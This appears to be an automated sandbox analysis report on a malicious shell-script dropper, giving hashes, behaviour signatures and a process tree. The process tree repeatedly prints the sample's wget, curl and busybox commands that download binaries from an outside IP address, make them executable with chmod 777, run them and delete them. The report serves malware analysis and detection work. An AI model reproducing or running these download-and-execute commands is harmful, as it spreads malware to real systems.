Analysis
-
max time kernel
75s -
max time network
77s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
-
Size
10KB
-
MD5
8695c3f5bc9a782d939a590ce31f75f3
-
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
-
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
-
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
-
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 861 chmod 885 chmod 897 chmod 927 chmod 963 chmod 761 chmod 833 chmod 891 chmod 921 chmod 804 chmod 909 chmod 951 chmod 810 chmod 873 chmod 939 chmod 945 chmod 957 chmod 741 chmod 867 chmod 733 chmod 747 chmod 855 chmod 879 chmod 975 chmod 903 chmod 915 chmod 933 chmod 969 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 735 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 742 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 748 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 763 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 805 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 811 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 834 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 856 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 862 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 868 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 874 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 880 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 886 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 892 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 898 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 904 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 910 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 916 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 922 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 928 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 934 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 940 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 946 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 952 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 958 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 964 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 970 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 976 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl
Processes
-
/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:731
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:740
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:746
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:754
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:802
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:809
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:829
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:854
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:860
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:866
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:872
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:878
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:884
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:890
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:896
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:902
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:908
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:914
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:920
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:926
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:932
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:934
-
-
